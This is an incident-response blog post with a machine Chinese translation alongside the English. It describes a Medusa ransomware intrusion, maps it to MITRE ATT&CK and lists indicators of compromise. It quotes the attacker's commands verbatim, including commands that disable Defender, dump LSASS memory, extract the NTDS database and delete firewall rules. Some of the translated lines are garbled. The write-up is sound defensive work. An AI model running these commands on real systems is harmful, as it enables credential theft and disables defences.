Intro 介绍
Our technical experts have written a blog series focused on Tactics, Techniques and Procedures (TTP’s) deployed by four ransomware families recently observed during NCC Group’s incident response engagements.
我们的技术专家撰写了一个博客系列,重点关注最近在 NCC Group 事件响应活动中观察到的四个勒索软件家族部署的战术、技术和程序 (TTP)。
In case you missed it, our last post analysed an Incident Response engagement involving the D0nut extortion group. In this instalment, we take a deeper dive into the Medusa.
如果您错过了,我们的上一篇文章分析了涉及 D0nut 勒索团伙的事件响应参与。在本期中,我们将更深入地了解美杜莎。
Not to be confused with MedusaLocker, Medusa was first observed in 2021, is a Ransomware-as-a-Service (RaaS) often using the double extortion method for monetary gain. In 2023 the groups’ activity increased with the launch of the ‘Medusa Blog’. This platform serves as a tool for leaking data belonging to victims.
不要与 MedusaLocker 混淆,Medusa 于 2021 年首次被观察到,是一种勒索软件即服务 (RaaS),通常使用双重勒索方法来获取金钱收益。2023 年,随着“美杜莎博客”的推出,这些团体的活动有所增加。该平台用作泄露属于受害者的数据的工具。
Summary 总结
This post will delve into a recent incident response engagement handled by NCC Group’s Cyber Incident Response Team (CIRT) involving Medusa Ransomware.
这篇文章将深入探讨 NCC Group 的网络事件响应团队 (CIRT) 最近处理的涉及 Medusa Ransomware 的事件响应活动。
Below provides a summary of findings which are presented in this blog post:
以下是这篇博文中介绍的调查结果摘要:
- Use of web shells to maintain access.
使用 Web Shell 来维护访问权限。 - Utilising PowerShell to conduct malicious activity.
利用 PowerShell 进行恶意活动。 - Dumping password hashes.
转储密码哈希。 - Disabling antivirus services.
禁用防病毒服务。 - Use of Windows utilises for discovery activities.
使用 Windows 用于发现活动。 - Reverse tunnel for C2.
C2 的反向隧道。 - Data exfiltration. 数据外泄。
- Deployment of Medusa ransomware.
部署美杜莎勒索软件。
Medusa 水母
Medusa ransomware is a variant that is believed to have been around since June 2021 [1]. Medusa is an example of a double-extortion ransomware where the threat actor exfiltrates and encrypts data. The threat actor threatens to release or sell the victim’s data on the dark web if the ransom is not paid. This means the group behind Medusa ransomware could be characterised as financially motivated. Victims of Medusa ransomware are from no particular industry suggesting the group behind this variant have no issue with harming any organisation.
美杜莎勒索软件是一种变种,据信自 2021 年 6 月以来就已经存在 [1]。美杜莎是双重勒索勒索软件的一个例子,威胁行为者在其中泄露和加密数据。威胁行为者威胁说,如果不支付赎金,就会在暗网上发布或出售受害者的数据。这意味着美杜莎勒索软件背后的组织可以被描述为出于经济动机。美杜莎勒索软件的受害者来自任何特定行业,这表明该变体背后的组织对伤害任何组织都没有问题。
Incident Overview 事件概述
Initial access was gained by exploiting an external facing web server. Webshells were created on the server which gave the threat actor access to the environment. From initial access to the execution of the ransomware, a wide variety of activity was observed such as executing Base64 encoded PowerShell commands, dumping password hashes, and disabling antivirus services. Data was exfiltrated and later appeared on the Medusa leak site.
初始访问权限是通过利用面向外部的 Web 服务器获得的。Webshell 是在服务器上创建的,它使威胁参与者能够访问环境。从最初访问到执行勒索软件,观察到各种各样的活动,例如执行 Base64 编码的 PowerShell 命令、转储密码哈希和禁用防病毒服务。数据被泄露,后来出现在美杜莎泄漏网站上。
Timeline 时间线
T – Initial Access gained via web shells.
T – 通过 Web shell 获得的初始访问权限。
T+13 days – Execution activity.
T+13 天 – 执行活动。
T+16 days – Persistence activity.
T+16 天 – 持久性活动。
T+164 days – Defense Evasion activity.
T+164 天 – 防御规避活动。
T+172 days – Persistence and Discovery activity.
T+172 天 – 持久性和发现活动。
T+237 days – Defense Evasion and Credential Access Activity started.
T+237 天 – 防御规避和凭据访问活动开始。
T+271 days – Ransomware Executed.
T+271 天 – 勒索软件已执行。
Mitre TTPs 斜接 TTP
Initial Access 初始访问
The threat actor gained initial access by exploiting a vulnerable application hosted by an externally facing web server. Webshells were deployed to gain a foothold in the victim’s environment and maintain access.
威胁参与者通过利用由面向外部的 Web 服务器托管的易受攻击的应用程序获得了初始访问权限。部署了 Webshell 以在受害者的环境中站稳脚跟并保持访问。
Execution 执行
PowerShell was leveraged by the threat actor to conduct various malicious activity such as:
威胁参与者利用 PowerShell 进行各种恶意活动,例如:
- Downloading executables 下载可执行文件
- Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc …
示例:powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc ...
- Example: powershell.exe -noninteractive -exec bypass powershell -exec bypass -enc …
- Disabling Microsoft Defender
禁用 Microsoft Defender- Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
示例:powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\\\\SOFTWARE\\\\\Policies\\\\Microsoft\\\\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
- Example: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;
- Deleting executables 删除可执行文件
- Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe
示例:powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe
- Example: powershell.exe -noninteractive -exec bypass del C:\\PRogramdata\\re.exe
- Conducting discovery activity
开展发现活动- Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain
示例:powershell.exe -noninteractive -exec bypass net group domain admins /domain
- Example: powershell.exe -noninteractive -exec bypass net group domain admins /domain
Windows Management Instrumentation (WMI) was utilised to remotely execute a cmd.exe process: wmic /node:<IP ADDRESS> / user:<DOMAIN\\USER> /password:<REDACTED> process call create ‘cmd.exe’.
Windows Management Instrumentation (WMI) 用于远程执行 cmd.exe 进程:wmic /node: / user: /password:进程调用创建“cmd.exe”。
Scheduled tasks were used to execute c:\\programdata\\a.bat. It is not known exactly what a.bat was used for, however, analysis of a compiled ASPX file revealed the threat actor had used PowerShell to install anydesk.msi.
计划任务用于执行 c:\\programdata\\a.bat。目前尚不清楚 a.bat 的确切用途,但是,对编译的 ASPX 文件的分析显示,威胁参与者已使用 PowerShell 安装 anydesk.msi。
- powershell Invoke-WebRequest -Uri hxxp://download.anydesk[.]com/AnyDesk.msi -OutFile anydesk.msi
- msiExec.exe /i anydesk.msi /qn
A cmd.exe process was started with the following argument list: c:\\programdata\\a.bat’;start-sleep 15;ps AnyDeskMSI
cmd.exe 进程已启动,参数列表如下:c:\\programdata\\a.bat';启动休眠 15;ps AnyDesk微星
Various services were installed by the threat actor. PDQ Deploy was installed to deploy LAdHW.sys, a kernel driver which disabled antivirus services. Additionally, PSEXESVC.exe was installed on multiple servers. On one server, it was used to modify the firewall to allow WMI connections.
威胁参与者安装了各种服务。安装了PDQ Deploy来部署LAdHW.sys,这是一个禁用防病毒服务的内核驱动程序。此外,PSEXESVC.exe 安装在多个服务器上。在一台服务器上,它用于修改防火墙以允许 WMI 连接。
Persistence 坚持
Maintaining access to the victim’s network was achieved by creating a new user admin on the external facing web server (believed to be the initial access server). Additionally, on the two external facing web servers, web shells were uploaded to establish persistent access and execute commands remotely. JavaScript-based web shells were present on one web server and the GhostWebShell [2] was found on the other. The GhostWebShell is fileless however, its compiled versions were saved in C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH>.
通过在面向外部的 Web 服务器(被认为是初始访问服务器)上创建一个新的用户管理员来实现对受害者网络的访问。此外,在两个面向外部的 Web 服务器上,上传了 Web Shell,以建立持久访问并远程执行命令。基于 JavaScript 的 Web Shell 存在于一台 Web 服务器上,而 GhostWebShell [2] 存在于另一台服务器上。GhostWebShell 是无文件的,但是,其编译版本保存在 C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\\\ 中。
Defence Evasion 防御规避
Evading detection was one of the aims for this threat actor due to the various defence evasion techniques utilised. Antivirus agents were removed from all affected hosts including the antivirus server. Microsoft Windows Defender capabilities were disabled by the threat actor using: powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path ‘HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender’ -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;.
由于使用了各种防御规避技术,逃避检测是该威胁行为者的目标之一。防病毒代理已从所有受影响的主机(包括防病毒服务器)中删除。威胁参与者使用以下方法禁用了 Windows Defender 功能Microsoft:powershell -exec bypass -c Set-MpPreference -DisableRealtimeMonitoring $true;New-ItemProperty -Path 'HKLM:\\\\SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows Defender' -Name DisableAntiSpyware -Value 1 -PropertyType DWORD -Force;。
Additionally, LAdHW.sys, a signed kernel mode driver was installed as a new service to disable antivirus services. The following firewall rule was deleted: powershell.exe -Command amp; {Remove-NetFirewallRule -DisplayName \”<Antivirus Agent Firewall Rule Name>\”.
此外,LAdHW.sys(已签名的内核模式驱动程序)作为新服务安装,以禁用防病毒服务。删除了以下防火墙规则:powershell.exe -Command amp;{Remove-NetFirewallRule -DisplayName \“<防病毒代理防火墙规则名称>\”。
The threat actor obfuscated their activity. Base64 encoded PowerShell commands were utilised to download malicious executables. It should be noted many of these executables such as JAVA64.exe and re.exe were deleted after use. Additionally, Sophos.exe (see below) which was packed with Themida, was executed.
威胁行为者混淆了他们的活动。Base64 编码的 PowerShell 命令用于下载恶意可执行文件。应该注意的是,其中许多可执行文件(如 JAVA64.exe 和 re.exe)在使用后被删除。此外,还执行了装有Themida的Sophos.exe(见下文)。

图 1 – Sophos.exe。
The value of HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential was modified to 1 so that logon credentials were stored in cleartext. This enabled the threat actor to conduct credential dumping activities.
HKLM\SYSTEM\ControlSet001\Control\SecurityProviders\WDigest\\UseLogonCredential 的值已修改为 1,以便登录凭据以明文形式存储。这使威胁参与者能够执行凭据转储活动。
Credential Access 凭据访问
The following credential dumping techniques were utilised by the threat actor:
威胁参与者使用了以下凭据转储技术:
- Using the Nishang payload to dump password hashes. Nishang is a collection of PowerShell scripts and payloads. The Get-PassHashes script, which requires admin privileges, was used.
使用 Nishang 有效负载转储密码哈希。Nishang 是 PowerShell 脚本和有效负载的集合。使用了需要管理员权限的 Get-PassHashes 脚本。 - Mimikatz was present on one of the external facing web servers, named as trust.exe. A file named m.txt was identified within C:\Users\admin\Desktop, the same location as the Mimikatz executable.
Mimikatz 存在于一个名为 trust.exe 的面向外部的 Web 服务器上。在 C:\Users\admin\Desktop 中标识了一个名为 m.txt 的文件,该文件与 Mimikatz 可执行文件的位置相同。 - An LSASS memory dump was created using the built-in Windows tool, comsvcs.dll.
LSASS 内存转储是使用内置的 Windows 工具 comsvcs.dll 创建的。- powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full
powershell -exec 绕过 -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png 已满
- powershell -exec bypass -c “rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ((ps lsass).id) C:\programdata\test.png full
- he built-in Windows tool ntdsutil.exe was used to extract the NTDS:
他内置的Windows工具ntdsutil.exe用于提取NTDS:- powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q
Powershell NTDSutil.exe 'ac i ntds' 'ifm' '创建完整的 C:\ProgramData\NT' Q Q
- powershell ntdsutil.exe ‘ac i ntds’ ‘ifm’ ‘create full c:\programdata\nt’ q q
Discovery 发现
The threat actor conducted the following discovery activity:
威胁参与者执行了以下发现活动:
Type of discovery activity 发现活动的类型 |
Description 描述 |
nltest /trusted_domains | Enumerates domain trusts 枚举域信任 |
net group ‘domain admins’ /domain 网络组“域管理员”/域 |
Enumerates domain groups 枚举域组 |
net group ‘domain computers’ / domain 网络组“域计算机”/域 |
Enumerates domain controllers 枚举域控制器 |
ipconfig /all | Learn about network configuration and settings 了解网络配置和设置 |
tasklist 任务列表 | Displays a list of currently running processes on a computer 显示计算机上当前正在运行的进程的列表 |
quser QUSER用户 | Show currently logged on users 显示当前登录的用户 |
whoami 呜 | Establish which user they were running as 确定他们以哪个用户身份运行 |
wmic os get name WMIC OS 获取名称 |
Gathers the name of the operating system 收集操作系统的名称 |
wmic os get osarchitecture WMIC OS 获取 OS架构 |
Establishes the operating system architecture 建立操作系统体系结构 |
Lateral Movement 横向移动
Remote Desktop Protocol (RDP) was employed to laterally move through the victim’s network.
远程桌面协议 (RDP) 用于在受害者的网络中横向移动。
Command and Control 指挥与控制
A reverse tunnel allowed the threat actor to establish a new connection from a local host to a remote host. The binary c:\programdata\re.exe was executed and connected to 134.195.88[.]27 over port 80 (HTTP). Threat actors tend to use common protocols to blend in with legitimate traffic which can be seen in this case, as port 80 was used.
反向隧道允许威胁参与者建立从本地主机到远程主机的新连接。二进制 c:\programdata\re.exe 已执行并连接到 134.195.88[.]27 通过端口 80 (HTTP)。威胁行为者倾向于使用通用协议来混合合法流量,在这种情况下可以看出,因为使用了端口 80。
Additionally, the JWrapper Remote Access application was installed on various servers to maintain access to the environment. AnyDesk was also utilised by the threat actor.
此外,JWrapper 远程访问应用程序安装在各种服务器上,以保持对环境的访问。AnyDesk也被威胁行为者使用。
Exfiltration 外泄
Data was successfully exfiltrated by the threat actor. The victim’s data was later published to the Medusa leak site.
威胁参与者已成功泄露数据。受害者的数据后来被发布到美杜莎泄密网站。
Impact 冲击
The Medusa ransomware in the form of gaze.exe, was deployed to the victim’s network. Files were encrypted, and .MEDUSA was appended to file names. The ransom note was named !!!READ_ME_MEDUSA!!!.txt. System recovery was inhibited due to the deletion of all VMs from the Hyper-V storage as well as local and cloud backups.
Medusa 勒索软件以 gaze.exe 的形式部署到受害者的网络。文件已加密,并且 .MEDUSA 被追加到文件名中。赎金票据被命名为!!READ_ME_MEDUSA!!!..txt。由于从 Hyper-V 存储中删除了所有 VM 以及本地和云备份,因此系统恢复受到抑制。
Indicators of Compromise
入侵指标
IOC Value IOC值 | Indicator Type 指标类型 | Description |
webhook[.]site webhook[.]网站 | Domain 域 | Malicious webhook |
bashupload[.]com bashupload[.].com | Domain 域 | Download JAVA64.exe and RW.exe |
tmpfiles[.]org tmpfiles[.]组织 | Domain 域 | Download re.exe |
134.195.88[.]27:80 | IP:PORT IP:端口 | C2 |
8e8db098c4feb81d196b8a7bf87bb8175ad389ada34112052fedce572bf96fd6 | SHA256 SHA256的 | trust.exe (Mimikatz.exe) |
3e7529764b9ac38177f4ad1257b9cd56bc3d2708d6f04d74ea5052f6c12167f2 | SHA256 SHA256的 | JAVA_V01.exe |
f6ddd6350741c49acee0f7b87bff7d3da231832cb79ae7a1c7aa7f1bc473ac30 | SHA256 SHA256的 | testy.exe / gmer_th.exe |
63187dac3ad7f565aaeb172172ed383dd08e14a814357d696133c7824dcc4594 | SHA256 SHA256的 | JAVA_V02.exe |
781cf944dc71955096cc8103cc678c56b2547a4fe763f9833a848b89bf8443c6 | SHA256 SHA256的 | Sophos.exe |
C:\Users\Sophos.exe C:\Users\Sophos.exe | File Path 文件路径 | Sophos.exe |
C:\Users\admin\Desktop\ C:\用户\admin\桌面\ | File Path 文件路径 | trust.exe JAVA_V01.exe testy.exe gmer_th.exe JAVA_V02.exe |
C:\ProgramData\JWrapper-Remote Access\ C:\ProgramData\JWrapper-远程访问\ |
File Path 文件路径 | JWrapper files |
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<APPLICATION NAME>\<HASH>\<HASH> C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Temporary ASP.NET Files\<应用程序名称>\\ |
File Path 文件路径 | GhostWebshell compiled files |
C:\Windows\PSEXESVC.exe C:\Windows\PSEXESVC.exe | File Path 文件路径 | PsExec |
C:\Users\<USERS>\AppData\Local\Temp\LAdHW.sys C:\Users\\AppData\Local\Temp\LAdHW.sys |
File Path 文件路径 | Disables AV |
C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe C:\Windows\AdminArsenal\PDQDeployRunner\service-1\PDQDeployRunner-1.exe |
File Path 文件路径 | PDQDeployRunner – used to deploy LAdHW.sys |
C:\Users\<USER>\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe C:\Users\\AppData\Local\Temp\2\gaze.exe C:\Windows\System32\gaze.exe |
File Path 文件路径 | Ransomware executable |
MITRE ATT CK®
Tactic 策略 | Technique 技术 | ID | Description 描述 |
Initial Access 初始访问 | Exploit Public-Facing Application 利用面向公众的应用程序 |
T1190 T1190型 | A vulnerable application hosted by an external facing web server was exploited . 利用了由面向外部的 Web 服务器托管的易受攻击的应用程序。 |
Execution 执行 | Windows Management Instrumentation | T1047 T1047型 | WMI used to remotely execute a cmd.exe process. WMI 用于远程执行 cmd.exe 进程。 |
Execution 执行 | Scheduled Task/Job: Scheduled Task 计划任务/作业:计划任务 |
T1053.005 编号:T1053.005 | Execute a.bat 执行 .bat |
Execution 执行 | Command and Scripting Interpreter: PowerShell 命令和脚本解释器:PowerShell |
T1059.001 编号:T1059.001 | PowerShell was leveraged to execute malicious commands. PowerShell 被用于执行恶意命令。 |
Execution 执行 | Software Deployment Tools 软件部署工具 |
T1072 T1072型 | PDQ Deploy was installed to deploy LAdHW.sys. 安装了 PDQ 部署以部署 LAdHW.sys。 |
Execution 执行 | System Services: Service Execution 系统服务:服务执行 |
T1569.002 编号:T1569.002 | PsExec was installed as a service. PsExec 作为服务安装。 |
Persistence 坚持 | Create Account: Domain Account 创建帐户:域帐户 |
T1136.0012 编号:T1136.0012 | A new user ‘admin’ was created to maintain access. 创建了一个新用户“admin”来维护访问权限。 |
Persistence 坚持 | Server Software Component: Web Shell 服务器软件组件:Web Shell |
T1505.003 编号:T1505.003 | Web shells were utilised to maintain access. Web Shell 用于维护访问。 |
Defense Evasion 防御规避 | Obfuscated Files or Information: Software Packing 混淆文件或信息:软件打包 |
T1027.002 编号:T1027.002 | Sophos.exe was packed with Themida. Sophos.exe 包含 Themida。 |
Defense Evasion 防御规避 | Indicator Removal: File Deletion 指标删除:文件删除 |
T1070.004 编号:T1070.004 | Malicious executables were deleted after use. 恶意可执行文件在使用后被删除。 |
Defense Evasion 防御规避 | Indicator Removal: Clear Persistence 指标删除:清除持久性 |
T1070.009 编号: T1070.009 | Malicious executables were deleted after use. 恶意可执行文件在使用后被删除。 |
Defense Evasion 防御规避 | Obfuscated Files or Information 混淆文件或信息 |
T1027 T1027型 | Base64 encoded PowerShell commands were utilised to download malicious executables. Base64 编码的 PowerShell 命令用于下载恶意可执行文件。 |
Defense Evasion 防御规避 | Modify Registry 修改注册表 | T1112 编号:T1112 | The WDigest registry key was modified to enable credential dumping activity. WDigest 注册表项已修改为启用凭据转储活动。 |
Defense Evasion 防御规避 | Impair Defenses: Disable or Modify Tools 损害防御:禁用或修改工具 |
T1562.001 编号:T1562.001 | Antivirus services were disabled. 防病毒服务已禁用。 |
Defense Evasion 防御规避 | Impair Defenses: Disable or Modify System Firewall 削弱防御:禁用或修改系统防火墙 |
T1562.004 编号:T1562.004 | Firewall rules were deleted. 已删除防火墙规则。 |
Credential Access 凭据访问 | OS Credential Dumping: LSASS Memory OS 凭据转储:LSASS 内存 |
T1003.001 编号: T1003.001 | Mimikatz was utilised. An LSASS memory dump was created. 使用了 Mimikatz。 已创建 LSASS 内存转储。 |
Credential Access 凭据访问 | OS Credential Dumping: NTDS OS 凭据转储:NTDS |
T1003.003 编号:T1003.003 | Ntdsutil.exe was used to extract the NTDS. Ntdsutil.exe 用于提取 NTDS。 |
Discovery 发现 | Domain Trust Discovery 域信任发现 |
T1482 编号:T1482 | Nltest was used to enumerate domain trusts. Nltest 用于枚举域信任。 |
Discovery 发现 | Permission Groups Discovery: Domain Groups 权限组发现:域组 |
T1069.002 编号:T1069.002 | Net was used to enumerate domain groups. Net 用于枚举域组。 |
Discovery 发现 | System Network Configuration Discovery 系统网络配置发现 |
T1016 T1016型 | Ipconfig was used to learn about network configurations. Ipconfig 用于了解网络配置。 |
Discovery 发现 | System Service Discovery 系统服务发现 |
T1007 T1007型 | Tasklist was used to display running processes. 任务列表用于显示正在运行的进程。 |
Discovery 发现 | Remote System Discovery 远程系统发现 |
T1018 T1018型 | Net was used to enumerate domain controllers. Net 用于枚举域控制器。 |
Discovery 发现 | System Owner/User Discovery 系统所有者/用户发现 |
T1033 T1033型 | Quser was used to show logged in users. Whoami was used to establish which user the threat actor was running as. Quser 用于显示已登录的用户。Whoami 用于确定威胁参与者以哪个用户身份运行。 |
Discovery 发现 | System Information Discovery 系统信息发现 |
T1082 T1082型 | Wmic was used to gather the name of the operating system and its architecture. Wmic 用于收集操作系统的名称及其体系结构。 |
Lateral Movement 横向移动 | Remote Services: Remote Desktop Protocol 远程服务:远程桌面协议 |
T1021.001 编号: T1021.001 | RDP was used to laterally move through the environment. RDP 用于在环境中横向移动。 |
Command and Control 指挥与控制 | Ingress Tool Transfer Ingress 工具转移 |
T1105 T1105型 | PowerShell commands were used to download and execute malicious files. PowerShell 命令用于下载和执行恶意文件。 |
Command and Control 指挥与控制 | Remote Access Software 远程访问软件 |
T1219 编号:T1219 | JWrapper and AnyDesk were leveraged. JWrapper 和 AnyDesk 被利用。 |
Command and Control 指挥与控制 | Protocol Tunnelling 协议隧道 | T1572 T1572型 | A reverse tunnel was established. 建立了反向隧道。 |
Exfiltration 外泄 | Exfiltration 外泄 | TA0010 编号: TA0010 | Data was exfiltrated and published to the leak site. 数据被泄露并发布到泄漏现场。 |
Impact 冲击 | Data Encrypted for Impact 数据加密以防影响 |
T1486 T1486型 | Medusa ransomware was deployed. 部署了美杜莎勒索软件。 |
Impact 冲击 | Inhibit System Recovery 抑制系统恢复 |
T1490 T1490型 | VMs from the Hyper-V storage and local and cloud backups were deleted. 删除了 Hyper-V 存储以及本地和云备份中的 VM。 |
References 引用
[2] https://www.mdsec.co.uk/2020/10/covert-web-shells-in-net-with-read-only-web-paths/
原文始发于Molly Dewis:Don’t throw a hissy fit; defend against Medusa